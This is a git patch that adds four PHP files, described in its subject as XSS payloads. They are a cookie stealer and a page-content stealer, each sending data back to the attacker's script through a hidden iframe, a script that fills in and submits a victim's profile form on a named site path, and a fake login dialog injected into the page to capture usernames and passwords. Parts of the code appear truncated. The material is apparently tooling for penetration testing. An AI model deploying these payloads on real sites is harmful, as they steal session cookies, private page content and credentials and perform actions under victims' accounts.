From dab2088267ade7720399da04c5e80e6e7a6287ee Mon Sep 17 00:00:00 2001 From: Strawp Date: Wed, 18 May 2016 14:21:52 +0100 Subject: [PATCH] Added the PHP xss payloads --- contentstealer.php | 33 +++++++++++++++++++ cookiestealer.php | 14 ++++++++ formsubmitter.php | 80 ++++++++++++++++++++++++++++++++++++++++++++++ loginpage.php | 56 ++++++++++++++++++++++++++++++++ 4 files changed, 183 insertions(+) create mode 100755 contentstealer.php create mode 100755 cookiestealer.php create mode 100755 formsubmitter.php create mode 100644 loginpage.php diff --git a/contentstealer.php b/contentstealer.php new file mode 100755 index 0000000..5563f50 --- /dev/null +++ b/contentstealer.php @@ -0,0 +1,33 @@ + +var url = "?c=" + encodeURIComponent(btoa(content)); +f = document.createElement('iframe'); +f.src = url; +document.getElementsByTagName('body')[0].appendChild(f); + diff --git a/cookiestealer.php b/cookiestealer.php new file mode 100755 index 0000000..5e0bfdb --- /dev/null +++ b/cookiestealer.php @@ -0,0 +1,14 @@ + +var url = "?c=" + encodeURIComponent(btoa(document.cookie)); +f = document.createElement('iframe'); +f.src = url; +document.getElementsByTagName('body')[0].appendChild(f); + diff --git a/formsubmitter.php b/formsubmitter.php new file mode 100755 index 0000000..823d60d --- /dev/null +++ b/formsubmitter.php @@ -0,0 +1,80 @@ +'; + document.getElementById('xss_target').onload = ifload; + frm.target = 'xss_target';\n"; + echo "frm.onsubmit = ''\n"; + if( isset( $_GET["action"] ) ){ + echo " frm.action = '".$_GET["action"]."';\n"; + } + if( isset( $els ) ){ + foreach( $els as $k => $v ){ + echo " frm.elements.namedItem('$k').value = '$v';\n"; + echo " console.log(frm.elements.namedItem('$k').value);\n"; + } + } + echo " frm.submit(); + } + "; + + // Call function to get the page, pass function to process the form + echo " + g('/Home/Settings/MyProfile/tabid/62/userid/100417/Default.aspx');\n"; + // g('".$_GET["url"]."');\n"; +?> + diff --git a/loginpage.php b/loginpage.php new file mode 100644 index 0000000..a219b6d --- /dev/null +++ b/loginpage.php @@ -0,0 +1,56 @@ + tag to pop up a modal dialog prompting for username and password which will send back creds to the same script +*/ +if( isset( $_GET["username"] ) ){ + if( isset( $_SERVER['HTTP_REFERER'] ) ){ + header( "Location: ".$_SERVER['HTTP_REFERER'] ); + }else{ + echo ""; + } + exit; +} +header( "Content-type: text/javascript" ); +if( isset( $_SERVER['HTTPS'] ) && $_SERVER['HTTPS'] ){ + $self = "https://"; +}else{ + $self = "http://"; +} +$self .= $_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']; +$html = " + +
+
+
+

Log in

+
+
+
+
+
"; +$html = preg_replace( "/[\n\r]/", "", $html ); +echo "document.body.innerHTML += \"$html\";"; +?>